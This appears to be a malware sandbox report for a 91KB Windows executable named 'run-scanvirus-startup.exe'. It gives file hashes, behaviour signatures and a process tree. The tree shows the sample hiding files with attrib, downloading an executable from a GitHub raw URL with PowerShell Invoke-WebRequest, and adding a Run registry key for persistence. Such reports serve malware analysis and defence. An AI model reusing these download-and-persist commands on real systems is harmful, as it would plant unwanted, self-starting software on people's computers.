Overview

overview

8

Static

static

3

run-scanvi...up.exe

windows7-x64

8

run-scanvi...up.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    18s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    20-05-2024 23:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    run-scanvirus-startup.exe

  • Size

    91KB

  • MD5

    66c623e47a13b30a3064a180a19dd1af

  • SHA1

    81b685fb44e1fcdb8a761a309a67c54efe9ec3fb

  • SHA256

    c52e55d927dfa1050e327681f4bb6c326e140c8d1f6b15cdec935ed9eaa32024

  • SHA512

    9d3fd5aba0d847ff0f2ae455079d52085fa8a6eae524b5ae6914e21aca9ef84cdd363824ed5198164bcb526750f1615ef1670053624fe74f34c0706e12ede2bc

  • SSDEEP

    1536:X7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIf8wWAOc:L7DhdC6kzWypvaQ0FxyNTBf85I

Score
8/10
executionpersistence

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs
  • Views/modifies file attributes 1 TTPs 11 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\run-scanvirus-startup.exe
    "C:\Users\Admin\AppData\Local\Temp\run-scanvirus-startup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2768
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1BAB.tmp\1BAC.tmp\1BAD.bat C:\Users\Admin\AppData\Local\Temp\run-scanvirus-startup.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1752
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:2288
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\1BAB.tmp\1BAC.tmp\1BAD.bat"
          3⤵
          • Views/modifies file attributes
          PID:2248
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\6ea5a28b-3996-422b-b7c6-9c420189f286.tmp"
          3⤵
          • Views/modifies file attributes
          PID:2576
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\7a1865d7-3ab4-4969-a3ef-2cf9d584e017.tmp"
          3⤵
          • Views/modifies file attributes
          PID:2936
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Kno52D3.tmp"
          3⤵
          • Views/modifies file attributes
          PID:2480
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\KnoE52F.tmp"
          3⤵
          • Views/modifies file attributes
          PID:3048
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RD3996.tmp"
          3⤵
          • Views/modifies file attributes
          PID:2780
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RGI10C4.tmp"
          3⤵
          • Views/modifies file attributes
          PID:2220
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RGI10C4.tmp-tmp"
          3⤵
          • Views/modifies file attributes
          PID:2932
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\1BAB.tmp\1BAC.tmp\1BAE.tmp"
          3⤵
          • Views/modifies file attributes
          PID:2536
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\scoped_dir2548_2049673321\6ea5a28b-3996-422b-b7c6-9c420189f286.tmp"
          3⤵
          • Views/modifies file attributes
          PID:2540
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\scoped_dir2548_391778098\7a1865d7-3ab4-4969-a3ef-2cf9d584e017.tmp"
          3⤵
          • Views/modifies file attributes
          PID:2584
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "C:\startup\adw.exe"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2624
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Invoke-WebRequest -Uri "https://raw.githubusercontent.com/rrpt66/cc/main/Scan-virus-and-Clear-file.exe" -OutFile "C:\startup\Scan-virus-and-Clear-file.exe"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2392
        • C:\Windows\system32\reg.exe
          Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Scan-virus-and-Clear" /t REG_SZ /d "C:\startup\Scan-virus-and-Clear-file.exe" /f
          3⤵
          • Adds Run key to start application
          PID:2564

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\1BAB.tmp\1BAC.tmp\1BAD.bat
      Filesize

      2KB

      MD5

      201325b50e17496d043dd86fa4f59cd4

      SHA1

      984541701da6805fa3414e2a4f72b934e5294ef9

      SHA256

      a604746d1477702ff5e6686f2fae526b511b79b2c7eedce8f218b3fa0f64ca74

      SHA512

      d74a2981cd2d5e141df54a8863721a85389497436d70daf0a86c67d109da9e8477a9e37714b2abcab679871c8d37eac88e67ef270acc041ca31720396f7b3ff4

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      607a5a29c5327dd66c37caedfc5012a3

      SHA1

      6513e58a4eae9a0ee163aa9896760f8ac2d6312e

      SHA256

      bf3f5c6c90f578ece80dd9eb7e589b6c986224179ffc79bb17f3cc3ddbdede3a

      SHA512

      30c02e36fad251705c4126013985cfbea8142129124a6548e313ed0f3e828eb9b4af312b36bf45bd416160b31a90b52d7aeab691eb5c30b7e22fb57448ab4094

      Download Submit

    • memory/2392-13-0x000000001B660000-0x000000001B942000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2392-14-0x0000000001F00000-0x0000000001F08000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2624-6-0x000000001B530000-0x000000001B812000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2624-7-0x00000000022E0000-0x00000000022E8000-memory.dmp

      Filesize

      32KB

      Download